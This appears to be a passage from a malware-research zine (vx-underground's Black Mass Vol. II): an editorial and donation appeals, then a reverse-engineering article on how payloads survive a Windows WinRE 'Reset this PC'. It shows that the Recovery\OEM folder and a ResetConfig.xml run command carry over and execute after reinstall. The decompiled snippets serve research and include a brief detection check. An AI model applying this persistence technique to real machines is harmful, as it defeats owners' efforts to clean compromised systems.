Hello, how are you?


Welcome to Black Mass Volume II. 


It has been nearly one year since we last spoke, time goes by fast doesn’t 
it? For those unfamiliar with Black Mass, this is a collection of works 
exclusive to the release of this zine. The ultimate goal of this series is 
to produce something interesting, and novel, or something which may 
encourage others to explore various malware techniques or concepts. 


Our first release was fun to develop. We had hundreds of wonderful people 
all across the planet give us feedback and share their thoughts and ideas 
following the release of the zine. We hope this issue also inspires 
people to explore malware and push the limitations of creativity. The only
limit to malware is the human imagination.


This issue is particularly special, though. Besides being our second
release, it pays homage to our first release, which our publisher botched.
To honor our many typos, mistakes, and failures, this book
doubles as a coloring book.


We hope you enjoy it. 


Thank you to everyone who has shown us love and support, has contributed
to our zines, and continues to inspire and motivate us.


We’ll speak again in Volume III.


—smelly 


vx-underground is the largest publicly accessible 
repository for malware source code, samples, and
papers on the internet. Our website does not use 
cookies, it does not have advertisements (omit 
sponsors) and it does not require any sort of 
registration. 


This is not cheap. This is not easy. This is a lot of 
hard work. 


So how can you help? We’re glad you asked. 


Become a supporter!


Become a supporter with monthly donations and get
access to our super cool exclusive Discord server so 
you can make friends with other nerds and berate vxug 
staff directly. 


https://donorbox.org/vxug-monthly


Donate! 


Feel better about using vx-underground’s resources on 
an enterprise level while expecting enterprise level 
functionalities and service by throwing a couple bucks 
our way! 


https://donorbox.org/support-vx-underground


Buy some of our cool shit! 


You’ll support actual human artists and have something
bitchin’ to wear to cons.
https://www.vx-underwear.org/


vx-underground only thrives thanks to the generosity 
of donors and supporters, and the many contributors of 
the greater research/infosec/malware communities. 


Thank you/uwu! 
Why You Shouldn’t Trust the Default WinRE Local Reinstall
Authored by LainPoster 


1.0: Introduction 


Hello everybody. In this entry I am going to talk about a very easy way to make payloads survive default WinRE
reinstallations of a home computer, even when the “delete all files” option is used. It is so easy, in fact, that
anybody can do it without reversing anything, provided they have looked around the MSDN documentation enough. That
would make this paper not worth writing, but I wanted to partially reverse the component that handles it, and this is
the result (after some long periods of time staring at IDA...). I also want to point out that some parts were left out
or optimized with significant modifications due to space. One example of these optimizations concerns ATL containers
with similar memory layouts, such as CStringT and CSimpleStringT: here CStringT (specifically CStringW) is used for
both for readability reasons. Likewise, symbols that were excessively long were shortened.


If you want to see some of my rebuilt structures/classes so you can continue reverse engineering other features of
interest, I will post a link to an SDK-like header file at the end of the entry that you can apply directly to IDA
and modify at will.


1.1: Brief background information. 


WinRE is, in informal terms, a “small” Windows OS (a.k.a. WinPE) stored in a WIM disk image file inside a
partition, which the machine boots from when your core OS is malfunctioning. As for the WIM file itself, there are
native Windows tools for manipulating it, such as DISM, so writing a parser is not necessary for modifying or
extracting the different executables as needed. For further technical details, refer to the references section.


Describing the entire internals of this environment (WinPE variant) is not the main objective of this paper. Instead 
we will focus on describing how the different recovery options are selected under the hood, and the most important 
interactions with the recovered OS that can lead to surviving reset (where you will see it is incredibly easy in the 
default configuration). 


However, the core question arises: how do you find the core binaries involved in this process? While the most
reasonable approach would have been debugging, I decided to first explore the mounted WIM itself and its core
files, looking for specific binaries that could be interesting, and googling them. This did not yield any results
until I found the following image with an exception error:


[Screenshot: the WinRE “Troubleshoot” menu (“Reset this PC: Lets you choose to keep or remove your files, and then
reinstalls Windows” and “Advanced options”), overlaid by a “RecEnv.exe - Application Error” dialog: “The instruction
at 0x00007FF96BD92BA6 referenced memory at 0x0000047D10A85798. The memory could not be read. Click on OK to
terminate the program.”]


(boomer “screenshot”)


This error was particularly interesting because it gave away one specific binary that runs after clicking the
“Reset this PC” option: RecEnv.exe. Following it, I identified the particularly interesting modules involved:
RecEnv.exe, sysreset.exe, and ResetEngine.dll. These are only some of them, but they are the ones we will focus on
throughout the entry. At first this looked like a simple coincidence, so I had to test how relevant these modules
were to the recovery process. The easiest approach was to use the WinRE command prompt to create a process with
some argument parameters reversed from the recovered binaries, especially sysreset.exe, which was the one that
caught my attention the most.


I have to say the results were very interesting, as you can see in the screenshots below, which matched the type
of result I was expecting and was interested in.


[Screenshots: the “Reset this PC” dialog asking “How would you like to reinstall Windows?” with the options “Cloud
download” (Download and reinstall Windows) and “Local reinstall” (Reinstall Windows from this device), plus the note
“If your connection is metered charges may apply. Cloud download can use more than 4 GB of data.”; and a process
list of the WinRE session showing RecEnv (X:\sources\recovery\RecEnv.exe) alongside svchost.exe, WallpaperHost.exe,
conhost.exe, winpeshl.exe, fontdrvhost.exe, lsass.exe and winlogon.exe under X:\Windows\System32.]


I want to point out an additional aspect that helped me statically analyze the execution flow, and that I found
later on: log files.


They contain a lot of details about the execution environment and are stored at the end of the whole recovery
process inside a folder named $SysReset, where each subdirectory has relevant information. I mainly used only two
log files from this directory: Logs/setuperr.log and Logs/setupact.log.


The main functions for logging to these files are Logging::Trace and Logging::TraceErr. For this work, setupact.log
was especially useful for debugging some of my payload script issues and for mapping the different blocks of code
that were executed, which helped me get a better big picture of the whole process. Initially I considered using
hooks to log stack traces of particularly interesting binaries, but for most of the work shown here no additional
tooling was needed. Without anything further to add, we can focus on describing how some of the WinRE execution
process details are staged and performed.


1.2.1: Reverse engineering WinRE binaries for execution scheduling internals.


While at first I looked around binaries such as RecEnv.exe and sysreset.exe, I eventually traced the execution of
the modules statically in the following way:
RecEnv.exe -> sysreset.exe -> ResetEngine.dll


The engine’s core execution process can be described from this point, particularly with ResetEngine.dll and
exports such as ResetExecute or ResetPrepareSession. The reason is the manipulation of an object named
Session, whose members are of huge interest for further understanding how the engine prepares itself for executing
the different options available.


struct Session
{
    CAtlArray m_arrayProperties;
    BoolProperty m_ConstructCheck;
    BoolProperty m_ReadyCheck;
    WorkingDirs* m_WorkingDirs;
    BYTE bytes_not_relevant_members[64]; //not relevant for current context
    CString m_TargetDriveLetter;
    Options* m_Options;
    SystemInfo* m_SystemInfo;
    DWORD m_IndexPhaseExecution;
    DWORD GapBytes;
    ExecState* m_ExecState;
    OperationQueue* m_OperationQueueOfflineOps; //Offline operations
    OperationQueue* m_OperationQueueOnlineOps; //Online operations
    BYTE bytes_not_relevant_members2[12]; //not relevant for current context
};


The main reason is that this object contains members of type OperationQueue, which is basically a typedef of
CAtlArray holding each DerivedOperation object to execute, tied to a particular derived Scenario type. Such
scenarios are initialized by ResetPrepareSession, and each of their related operations is executed by
ResetExecute.


struct __cppobj DerivedScenario : Scenario
{
    void* m_Telemetry;
    ScenarioType* m_ScenarioType;
    void* m_CloudImgObjPtr;
    void* m_PayloadInfoPtr;
    Options* m_OptionsObjPtr;
    SystemInfo* m_SystemInfoPtr;
};


Describing the functionality inside ResetPrepareSession further, the method Session::Construct stands out by
calling Scenario::Create and Scenario::Initialize. These methods create a particular derived Scenario object; there
is a maximum of 13 types, and the one that matters most to us is ResetScenario. Additionally, the vtable from the
base class is replaced with the one from the derived class type, effectively overriding it with the functionality
specific to that case. Most derived scenarios have the same size; however, for the bare metal scenario cases,
additional disk information members are added.


On the other hand, the Operation objects are queued to the OperationQueue by an internal method of each derived
scenario type: InternalConstruct. Importantly, its results are applied to both the online and the offline operation
queues. This method is also in charge of initializing the ExecState object, which, as we will see later on, is
relevant for our reverse engineering effort.


dwResult = OperationQueue::Create(OperationQueueOffline);
if ( dwResult >= 0 ){
    dwResult = OperationQueue::Create(OperationQueueOnline);
    if ( dwResult >= 0 ){
        vtableDerivedScenario = DerivedScenarioObj->vTableScenario; //Overridden by derived type.
        dwResult = vtableDerivedScenario->InternalConstruct(DerivedScenarioObj, ExecStatePtr,
            OperationQueueOffline, OperationQueueOnline);
        if ( dwResult >= 0 ){
            *OperationQueueOfflineOperations = OperationQueueOffline;
            *OperationQueueOnlineOperations = OperationQueueOnline;
        }
    }
}


Excerpt: Code snippet per Scenario to build OperationQueue objects inside Scenario::Construct. 


The InternalConstruct method redirects to an internal DoConstruct function. Inside this function, Operation::Create
is passed a CStringW, the OperationTypeID member, which is used as a key into a
CAtlMap<CStringW, struct OperationMetadata>. Once the specific type is found, the derived Operation is built by
calling the OperationMetadata m_FactoryMethod member, which is basically a DerivedOperation constructor.


struct OperationMetadata
{
    CString m_OperationTypeID; //1.-ATL wchar_t container for operation type ID.
    void* m_FactoryMethod; //2.-Main method for building derived Operation.
};


OpNode = CAtlMap<CStringW, OperationMetadata>::GetNode(m_OperationTypeIdArg, &iBinArg, &nHashArg, &prevNode);
OpMetadataObj = &OpNode->m_value; //Finding node from input Operation ID name.
FactoryMethod = OpMetadataObj->m_FactoryMethod;
DerivedOpObjPtr = FactoryMethod(); //Calling factory method for derived Operation
*DerivedOperationObjPtr = DerivedOpObjPtr;


Excerpt: Code snippet to build derived Operation objects inside Operation::Create, using Factory method. 
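The lookup-then-construct pattern described above can be illustrated with a small standalone sketch. It is only an analogy, not the engine's code: std::map stands in for CAtlMap, the two derived operations are empty stand-ins, and the type ID strings ("ExecSetup", "RunExtension") as well as the helper names Registry and CreateOperation are hypothetical.

```cpp
#include <cassert>
#include <functional>
#include <map>
#include <memory>
#include <string>

// Hypothetical stand-ins for the engine's Operation hierarchy.
struct Operation {
    virtual ~Operation() = default;
    virtual std::wstring Name() const = 0;
};

struct OpExecSetup : Operation {
    std::wstring Name() const override { return L"OpExecSetup"; }
};

struct OpRunExtension : Operation {
    std::wstring Name() const override { return L"OpRunExtension"; }
};

// Plays the role of OperationMetadata: a type ID plus a factory method.
struct OperationMetadata {
    std::wstring typeId;
    std::function<std::unique_ptr<Operation>()> factory;
};

// Registry keyed by operation type ID (std::map instead of CAtlMap).
// The type ID strings are assumptions made for this example.
inline const std::map<std::wstring, OperationMetadata>& Registry() {
    static const std::map<std::wstring, OperationMetadata> registry = {
        {L"ExecSetup", {L"ExecSetup", [] { return std::make_unique<OpExecSetup>(); }}},
        {L"RunExtension", {L"RunExtension", [] { return std::make_unique<OpRunExtension>(); }}},
    };
    return registry;
}

// Finds the metadata node for the type ID and calls its factory method.
// Returns nullptr when the type ID is unknown.
inline std::unique_ptr<Operation> CreateOperation(const std::wstring& typeId) {
    const auto it = Registry().find(typeId);
    if (it == Registry().end()) return nullptr;
    return it->second.factory();
}
```

Calling CreateOperation(L"RunExtension") yields an object whose virtual Name() resolves to the derived type, which is the same effect the vtable replacement has in the real binary.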


Additionally, just like with the Scenario class, the derived Operation object also replaces its base Operation vtable 
for executing specific functionalities to the operation (both cases are due to polymorphism). Below you can see the 
base Operation memory layout for each possible operation to be executed. 


struct Operation //Base operation class/struct.
{
    VtableOperation *VtableOperation; //Replaced by derived type (Polymorphism)
    CAtlArray m_ArrayProperties;
    CString m_OperationName;
    BoolProperty m_ExecutedProperty;
    Session* m_SessionObjPtr;
    void* m_TelemetryObjPtr;
};

Regarding ResetExecute, the internal function Session::ExecuteOffline redirects to Executer::Execute, which 
eventually leads to each queued derived operation’s InternalExecute method. 


PushButtonReset::Logging::Trace(0, L"Operation validity check passed, will execute");
DerivedOpObj->m_SessionObj = SessionObjCommands;
DerivedOpObj->m_TelemetryObjPtr = TelemetryObjPtr;
dwResult = (DerivedOpObj->VtableOperation->InternalExecute)(DerivedOpObj, ExecStateObjPtr, ArgObject);
DerivedOpObj->m_SessionObj = 0i64;
DerivedOpObj->m_TelemetryObjPtr = 0i64;


if ( dwResult >= 0 ) {
    DerivedOperation->m_ExecutedProperty.bCheck = 1;
} else {
    Logging::TraceErr(2i64, dwResult, "PushButtonReset::Operation::Execute",
        "base\\reset\\engine\\exec\\src\\operation.cpp", 580, L"Internal failure in subtype execution routine");
}


Excerpt: Code snippet showing InternalExecute per derived Operation inside Executer::Execute. Notice how 
the members mainly passed as arguments to InternalExecute come from the base Operation type. 
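As a rough illustration of this dispatch, the sketch below runs a queue of polymorphic operations and marks each one as executed when its InternalExecute returns a non-negative result. The names HResult, OkOperation, FailingOperation and ExecuteQueue are hypothetical, and stopping at the first failure is an assumption of the sketch: the excerpt only shows that a failure is logged, not what the engine does next.

```cpp
#include <cassert>
#include <cstdint>
#include <memory>
#include <vector>

using HResult = std::int32_t;  // negative values mean failure, as with HRESULT

struct Operation {
    bool executed = false;  // plays the role of m_ExecutedProperty
    virtual ~Operation() = default;
    virtual HResult InternalExecute() = 0;  // overridden per derived operation
};

struct OkOperation : Operation {
    HResult InternalExecute() override { return 0; }
};

struct FailingOperation : Operation {
    HResult InternalExecute() override { return -1; }  // any negative code
};

using OperationQueue = std::vector<std::unique_ptr<Operation>>;

// Runs the queued operations in order through virtual dispatch.
// Assumption: the loop stops at the first failing operation.
inline HResult ExecuteQueue(OperationQueue& queue) {
    for (auto& op : queue) {
        const HResult hr = op->InternalExecute();
        if (hr < 0) return hr;  // the real engine logs through TraceErr here
        op->executed = true;
    }
    return 0;
}
```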


While other functions are also involved in this process besides the ones just mentioned, I consider it important to
add only one more: the call to Operation::ApplyEffects that follows this code snippet. It basically executes the
derived operation’s InternalApply method, which may contain important initializations that are used throughout the
entire execution process, as will be seen below.


Staying on topic, there is a particular registry value used across the ResetEngine.dll binary, named TargetOS,
which is set under HKLM\SOFTWARE\Microsoft\RecoveryEnvironment in the WinRE environment. This registry value is
extremely important because it is used to initialize different members inside some of the most important classes
used in the recovery process. One example can be found in the m_OldOSRoot, m_NewOsRoot and m_TargetVolumeRoot
members of the ExecState class. This object is initialized through the DerivedScenario’s InternalConstruct method
mentioned above, where it can be seen as a parameter to the method in the code snippet.


More specifically, m_OldOSRoot and m_TargetVolumeRoot are initialized using m_TargetVolume from the
DerivedScenario object, which in turn comes from the Session object, which is initialized from this registry value
as an argument to ResetCreateSession. However, all these members are only set and used after the execution of one
of the queued operations, specifically OpExecSetup, when its InternalApply method is called in the scheduled
execution, as shown below.


if (!ExecState->m_HaveOldOs.bCheck)
{
    ATL::CStringW(&OldWindowsDir, L"Windows.old");
    Path::Combine(m_TargetVolumeRoot, &OldWindowsDir, &ExecStateObj->m_OldOSRoot.CStringPath);
}
ExecStateObj->m_HaveNewOS.bCheck = 1;
CStringW::operator=(&ExecState->m_NewOSRoot.CStringPath, &m_TargetVolumeRoot);


Excerpt: Setting up m_NewOsRoot and m_OldOsRoot after OpExecSetup InternalApply execution. 


This raises the question: why is this Windows.old subdirectory specifically set up for the m_OldOsRoot
member? This is mainly a consequence of the InternalExecute method of the same OpExecSetup operation, which uses
SetupPlatform.dll when the function CRelocateOS::DoExecute is called. We will not dive deep into the
implementation of this aspect, since it’s not relevant enough for this paper. Put briefly, it migrates some of the
subdirectories of the “Old OS” and their files under “<DriveLetter>:\Windows.old\”, a temporary directory used for
the recovery process itself. We will see exactly which migrated subdirectories are relevant to us in the next
section.


Now that we know everything is derived from this registry value, how is it even set for the WinRE environment to
interact with the OS volume? What I found out is that RecEnv.exe is in charge of this through
CRecoveryEnvironment::ChooseOs. While tracing this function dynamically, the internal function
CBootCfg::GetAssociatedOs stands out. What is particularly notable in this method is the creation of a struct
instance labeled SRT_OS_INFO, whose members are populated inside CBootCfg::_PopulateOsInfoForObject. If you wonder
why this matters: its first member is used for initializing this registry value.


Before calling _PopulateOsInfoForObject, there are interactions with the system BCD store, from which the proper
BCD object handle is obtained to retrieve further data. From this point, a selection is made based on checks that
mainly focus on matching GUIDs to find the “Associated OS”, a.k.a. our to-be-recovered OS. This is mainly done
inside CBootCfg::_IsAssociatedOs. After this check has been satisfied, the _PopulateOsInfoForObject method
eventually calls CBootCfg::_GetWinDir and, from here, using BcdQueryObject, a _BCDE_DEVICE struct is used to
retrieve the device object’s full name for the particular volume; during my debugging sessions this went through
the method CBootCfg::_GetPathFromBcdePath. This path is then used with Utils::ForceDriveLetterForVolumeMountPoint
to retrieve a proper drive letter to interact with the volume. Then, using BcdGetElementDataWithFlags, a relative
WinDir path string (/Windows) is retrieved using another BCD object handle related to the associated-OS GUID check,
and both are concatenated to form <DriveLetter>:/Windows, which is the end result used for the TargetOS registry
value.


You might be asking: “but isn’t the engine itself using a drive letter, instead of this directory path?” To answer
this, we just have to keep in mind that when sysreset.exe calls ResetCreateSession, Path::GetDrive is used inside
GetTargetDrive to extract only the drive letter from the data set in the TargetOS registry value; the rest of the
steps work as described above. Another aspect I have to point out is that everything described here has been
explained exclusively from the perspective of the WinRE environment execution flow for ease, since there are
different ways to trigger this “Reset this PC” option (but all of them have the same results for our payload).
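The drive-letter extraction is simple enough to sketch in a few lines. The function below is a hypothetical stand-in written for illustration (ExtractDriveLetter is not a name from the binary, and the real Path::GetDrive may handle more path forms); it only shows how a value such as <DriveLetter>:/Windows reduces to the drive prefix.

```cpp
#include <cassert>
#include <cwctype>
#include <string>

// Returns the "X:" prefix of a path such as "C:/Windows" or "C:\Windows",
// or an empty string when the path does not start with a drive letter.
inline std::wstring ExtractDriveLetter(const std::wstring& path) {
    if (path.size() >= 2 &&
        std::iswalpha(static_cast<std::wint_t>(path[0])) != 0 &&
        path[1] == L':') {
        return path.substr(0, 2);
    }
    return std::wstring();
}
```

For example, ExtractDriveLetter(L"C:/Windows") gives L"C:", while a path without a drive prefix gives an empty string.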


Now, we can ask the most important question after all the explanations done so far: “What additional details can 
be pointed out for abusing this specific scenario as needed?” For that, I have to show you more implementation
details regarding the ResetScenario, which answer this question in much more detail. 


1.2.2: ResetScenario: reversing specific derived operation objects for surviving reset. 


Now that we have described exactly how operations and each scenario are constructed by ResetEngine.dll, let’s focus
on ResetScenario::InternalConstruct. This method redirects to an internal function,
ResetScenario::DoConstruct, which adds each Operation object using OperationQueue::Enqueue. For
this scenario, only the offline operation queue is set, and the overall list of operations being executed can be
seen below. (Remember that online operations are not set in this case.)


Offline operation queue: 24 operations (CAtlArray)
0: Clear storage reserve (OpClearStorageReserve)
1: Delete OS uninstall image (OpDeleteUninstall)
2: Set remediation strategy: roll back to old OS (OpSetRemediationStrategy)
3: Set 'In-Progress' environment key (OpMarkInProgress)
4: Back up WinRE information (OpSaveWinRE)
5: Archive user data files (OpArchiveUserData)
6: Reconstruct Windows from packages (OpExecSetup)
7: Save flighted build number to new OS (OpSaveFlight)
8: Persist install type in new OS registry (OpSetInstallType)
9: Notify OOBE not to prompt for a product key (OpSkipProductKeyPrompt)
10: Migrate setting-related files and registry data (OpMigrateSettings)
11: Migrate AppX Provisioned Apps (OpMigrateProvisionedApps)
12: Migrate OEM PBR extensions (OpMigrateOEMExtensions)
13: Set 'In-Progress' environment key (OpMarkInProgress)
14: Restore boot manager settings (OpRestoreBootSettings)
15: Restore WinRE information (OpRestoreWinRE)
16: Install WinRE on target OS (OpInstallWinRE)
17: Execute OEM extensibility command (OpRunExtension)
18: Show data wipe warning, then continue (OpSetRemediationStrategy)
19: Delete user data files (OpDeleteUserData)
20: Delete old OS files (OpDeleteOldOS)
21: Delete Encryption Opt-Out marker in OS volume (OpDeleteEncryptionOptOut)
22: Trigger WipeWarning remediation if a marker file is set (OpTriggerWipeWarning)
23: Set remediation strategy: ignore and continue (OpSetRemediationStrategy)


Now, we have to focus on the specific operations that are most relevant to us, keeping in mind the execution order
of the OperationQueue array shown above and our main objective, which is achieving some sort of filesystem
persistence mechanism (surviving files and achieving code execution). The first thing I had to focus on while
trying to survive in such an environment was finding where exceptions to deletion could be happening inside the
construction of the operation queue. Because of this, I initially considered operations such as OpDeleteUserData
and OpArchiveUserData, since they seem relevant, but they end up not being useful at all since they copy and delete
the data they move, which is mainly $SysReset’s stored old OS folders and files. (The path would be
<DriveLetter>:\$SysReset\OldOs.)


Because of this, I focused instead on operations related to migration, such as OpMigrateOEMExtensions. This
derived Operation object basically inherits everything from BaseOperation and doesn’t have any additional relevant
members, so what is most interesting about it is, of course, OpMigrateOEMExtensions::InternalExecute.


At this point, code speaks louder than words; the optimized code snippet is shown below:


Path::Combine(&ExecState->m_OldOSRoot.CStringPath, L"Recovery", &OldOsRecoveryPath);
//Creating Recovery folder path with Old Os argument
Path::Combine(&ExecState->m_NewOSRoot.CStringPath, L"Recovery", &NewOsRecoveryPath);
//Creating Recovery folder path with New Os argument.
if (!Directory::Exists(&NewOsRecoveryPath))
{
    Logging::Trace(0, L"Migra...");
    Path::AddAttributes(&NewOsRecoveryPath);
    Directory::CopySecurity(&OldOsRecoveryPath, &NewOsRecoveryPath);
}
NewOsRoot = &ExecState->m_NewOSRoot.CStringPath;
OldOsRoot = &ExecState->m_OldOSRoot.CStringPath;
TargetVolRoot = &ExecState->m_TargetVolumeRoot.CStringPath;
PbrMigrateOEMProvPackages(TargetVolRoot, OldOsRoot, NewOsRoot); //Moving packages files.
PbrMigrateOEMScripts(TargetVolRoot, OldOsRoot, NewOsRoot); //Moving scripts, core target function.
PbrMigrateOEMAutoApply(TargetVolRoot, OldOsRoot, NewOsRoot); //Moving autoapply files.


Of all the functions that may be interesting, the one I most want to cover is PbrMigrateOEMScripts. You might be
asking why. It is pretty simple: this is the function in charge of moving the files inside the
<DriveLetter>:\Recovery\OEM folder from the OldOs (Windows.old folder) to the NewOs (<DriveLetter>).


Path::Combine(m_OldOsRoot, L"Recovery\\OEM", &OldRecOemPath);
Path::Combine(m_NewOsRoot, L"Recovery\\OEM", &NewRecOemPath);
Logging::Trace(0, L"... [%s] ... [%s]", OldRecOemPath.m_pchData, NewRecOemPath.m_pchData);
if (Directory::Exists(&OldRecOemPath) && !Directory::Exists(&NewRecOemPath))
{
    Directory::Move(&OldRecOemPath, &NewRecOemPath, 1u);
}


Excerpt: Optimized PbrMigrateOEMScripts snippet to move entire directory from old to new OS 
(with Directory::Move) 


Path::GetDirectory(NewOsRecoveryOemPath, &ParentDirRecovery);
if ( Directory::Exists(&ParentDirRecovery) )
{
    Path::GetShortName(OldOsRecoveryOemPath, &ShortNameRecOemPath);
    Path::GetCanonical(OldOsRecoveryOemPath, &CanonicalRecOemPathOld);
    Path::GetCanonical(NewOsRecoveryOemPath, &CanonicalRecOemPathNew);
    dwFlags = !argFlag;
    if ( MoveFileExW(CanonicalRecOemPathOld, CanonicalRecOemPathNew, dwFlags) )
    {
        if (ADJ(ShortNameRecOemPath.m_pchData)->nDataLength > 0)
        {
            Path::SetShortName(NewOsRecoveryOemPath, &ShortNameRecOemPath);
        }
    }
}


Excerpt: Optimized Directory::Move snippet related to moving subdirectories and files. 


This code effectively shows how the engine itself moves arbitrary files from the “OldOS” (Windows.old) to the
“NewOS” (<DriveLetter>), as long as they are inside this folder: Recovery\OEM. This, however, is not enough to
achieve any sort of code execution on the target recovered OS, since we are limited to this directory for storage
and there is no direct, reliable interaction through which the recovered OS would use the migrated payload from
this particular directory.


This is where an additional Operation in the queue can be chained together for exactly this purpose: 
OpRunExtension. 


struct __cppobj OpRunExtension : Operation
{
    BoolProperty m_IsRequired;
    StringProperty m_PhaseExecution;
    PathProperty m_ExtensibilityDir;
    StringProperty m_CommandPath;
    StringProperty m_Arguments;
    IntProperty m_Duration;
    IntProperty m_Timeout;
    PathProperty m_RecoveryImageLocation;
    BoolProperty m_WipeDataCheck;
    BoolProperty m_PartitionDiskCheck;
};


To show exactly how it matters to our intention, we have to look at the implementation details inside
OpRunExtension::InternalExecute. There are functions in charge of setting up the necessary environment, mainly
OpRunExtension::SetEnvironmentVariables and, of course, OpRunExtension::RunCommand. The latter is the most
important function of this particular derived Operation in our context, but I will describe both.


OpRunExtension::ExecuteCompatWorkarounds(RunExtensionObj);
dwCodeError = Path::Combine(&ExecStateObj->m_TargetVolumeRoot.CStringPath, L"...", &TargetWinDir);
if (dwCodeError >= 0){
    OpRunExtension::SetEnvironmentVariables(RunExtensionObj, &TargetWinDir.m_pchData);
    OpRunExtension::RunCommand(RunExtensionObj);
}


Excerpt: Optimized OpRunExtension::InternalExecute snippet showing the overall execution flow.


First, OpRunExtension::SetEnvironmentVariables is not too important, but its core functionality is
manipulating different registry values under HKLM\SOFTWARE\Microsoft\RecoveryEnvironment. Some of those
values include RecoveryImage, AllVolumesFormatted, DiskRepartitioned and even TargetOS, but the latter is only
created if it doesn’t exist, which is usually not the case as far as my tests have shown. On the other hand,
OpRunExtension::RunCommand is much more interesting for our purposes. To explain it, we first have to cover a few
things related to the OpRunExtension object.


During the execution of ResetScenario’s DoConstruct/InternalConstruct methods, there are particular members 
that are initialized here, and most of them come from an object labeled as “Extensibility”. 


Extensibility::HasCommandFor(ExtensibilityObjectPtr, 3u); //Reset End phase checks.
Logging::Trace(0, L"...");
Extensibility::...(ExtensibilityObjectPtr, 3u, &ExtensibilityDir, &ScriptPath, &Arguments, &dwSeconds);
ArgsString = PayloadInfo::GetImage(&Arguments);
ScriptPath = PayloadInfo::GetImage(&ScriptPath);
OemFolderPath = ...;
Logging::Trace(0, L"... OEM ... command defined in [%s] ...", OemFolderPath, ScriptPath, ArgsString,
    (DWORD)dwSeconds);
ATL::CStringW(&OperationNameStr, L"...");
Operation::Create(&OperationNameStr, OpRunExtensionObjPtr);
BoolProperty::operator=(&OpRunExtensionObjPtr->m_IsRequired, ...);
ATL::CStringW(&m_PhaseExec, L"R...");
PathProperty::operator=(&OpRunExtensionObjPtr->m_PhaseExecution, &m_PhaseExec);
PathProperty::operator=(&OpRunExtensionObjPtr->m_ExtensibilityDir, &ExtensibilityDir);
PathProperty::operator=(&OpRunExtensionObjPtr->m_CommandPath, &ScriptPath);
PathProperty::operator=(&OpRunExtensionObjPtr->m_Arguments, &Arguments);
IntProperty::operator=(&OpRunExtensionObjPtr->m_Duration, dwDurationSeconds);
IntProperty::operator=(&OpRunExtensionObjPtr->m_Timeout, 3600);
BoolProperty::operator=(&OpRunExtensionObjPtr->m_WipeDataCheck, ...);
BoolProperty::operator=(&OpRunExtensionObjPtr->m_PartitionDiskCheck, ...);
OperationQueue::Enqueue(OperationQueueOffline, OpRunExtensionObjPtr);


Excerpt: Optimized ResetScenario::DoConstruct snippet to understand OpRunExtension member 
initialization. 


To explain how this Extensibility object is initialized, we need to focus on the method used for this precise
purpose and the class members involved in it. The answer is simple: it happens inside
ResetScenario::InternalConstruct, using the SystemInfo object with the member I labeled as
m_TargetOEMResetConfigPath. This is basically the path to ResetConfig.xml, which has to be stored in the
Recovery\OEM directory of the “OldOs”.


StringInOemExtensibility = CStringW::CloneData(ResetScenarioObj->m_SystemInfoPtr->
    m_TargetOEMResetConfigPath.CString.m_pchData);
if ( StringInOemExtensibility->nDataLength > 0 )
{
    Logging::Trace(0, L"...");
    Extensibility::Load(&StringInOemExtensibility, ExtensibilityObj);
}


Excerpt: Optimized ResetScenario::InternalConstruct snippet, which shows the usage of the SystemInfo
member, used for referring to the ResetConfig.xml path inside Extensibility::Load.
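Since the engine only loads the extensibility configuration when this path is populated, a quick check before trusting a local reinstall is to see whether a ResetConfig.xml is sitting under Recovery\OEM on the volume in question. The sketch below is a minimal illustration using std::filesystem; the function names are hypothetical, and it assumes the volume root is passed in by the caller and that the folder is readable (on a real system Recovery is usually hidden and access-restricted).

```cpp
#include <cassert>
#include <filesystem>
#include <fstream>
#include <sstream>
#include <string>
#include <system_error>

namespace fs = std::filesystem;

// Builds <volumeRoot>/Recovery/OEM/ResetConfig.xml.
inline fs::path OemResetConfigPath(const fs::path& volumeRoot) {
    return volumeRoot / "Recovery" / "OEM" / "ResetConfig.xml";
}

// True when the configuration file exists as a regular file.
inline bool HasOemResetConfig(const fs::path& volumeRoot) {
    std::error_code ec;  // report "not found" instead of throwing on errors
    return fs::is_regular_file(OemResetConfigPath(volumeRoot), ec);
}

// Returns the file's text so it can be reviewed by hand;
// the result is empty when the file is missing or unreadable.
inline std::string ReadOemResetConfig(const fs::path& volumeRoot) {
    std::ifstream in(OemResetConfigPath(volumeRoot), std::ios::binary);
    std::ostringstream text;
    text << in.rdbuf();
    return text.str();
}
```

If HasOemResetConfig returns true on a home machine that shipped without OEM customizations, the file's contents and the other files next to it deserve a manual look before the reset is started.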


If we focus on this ResetConfig.xml file path and how it is used, reverse engineering the XML parsing itself is
not particularly interesting. Briefly, this Extensibility object uses the method Extensibility::ParseCommand, with
XmlNode::GetAttribute and XmlNode::GetChildText, to check for values that are documented here. Specifically, parsed
information regarding the Run/Path XML elements is stored under the Extensibility object’s first member, which is of
type CAtlMap<enum RunPhase, struct RunCommand>, by matching the enum RunPhase key and then modifying the
corresponding RunCommand structure with the parsed information from the XmlNode object.


If you wonder what all this means, it is just an overcomplicated way to say that we have to focus on three particular
XML elements: RunPhase, Run and Path, at their proper execution phase, to trigger some possible code
execution. For our purpose, we only care about RunPhase == FactoryReset_AfterImageApply, which is represented
in the implementation as the enum PhaseEnd with DWORD value 0x3.


However, while we know how to set up the environmental aspects of our payload so the WinRE engine works 
around it, we still don’t know how exactly the payload will be executed. To answer this, after explaining some of the 
workings around the setup for core objects related to OpRunExtension, we have to return again to the 
RunCommand method, which builds a command line string with arguments. 


PbrMountScriptDirectory(&this->m_ExtensibilityDir.CStringPath, &ScriptDirectory);
Logging::Trace(0, L"... %s ... %s]", this->m_ExtensibilityDir.
    CStringPath.m_pchData, ScriptDirectory.m_pchData);
Path::Combine(&ScriptDirectory, &this->m_CommandPath.CStringMember, &ScriptFileCommand);
ATL::CStringW::Format(&ScriptFileName, L"%s %s", ScriptFileCommand.m_pchData, this->m_Arguments.
    CStringMember.m_pchData);
Logging::Trace(0, L"... [%s]", ScriptFileName.m_pchData);

dwResultCode = Command::Execute(&ScriptFileName, unused_arg, CommandObjPointer);
if ( dwResultCode >= 0 )
    dwCodeResult = Command::Wait(CommandObjPtr, this->m_Timeout.m_int_for_property);
    if ( dwCodeResult < 0 ){
        dwResultCode = 0x800705B4;
        if ( dwCodeResult == 0x800705B4 ){
            Logging::Trace(...);
            Command::Cancel(pCommandObj);
        Logging::Trace(...);
    else{
        Logging::Trace(0, L"...");
        dwErrorCode = 0;
        dwResultCode = Command::GetExitCode(CommandObj, &dwErrorCode);
        if ( dwResultCode >= 0 ){
            if ( dwErrorCode )
                Logging::Trace(0, L"... (%u)", dwErrorCode);


Excerpt: Optimized OpRunExtension::RunCommand for overall execution flow. 
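
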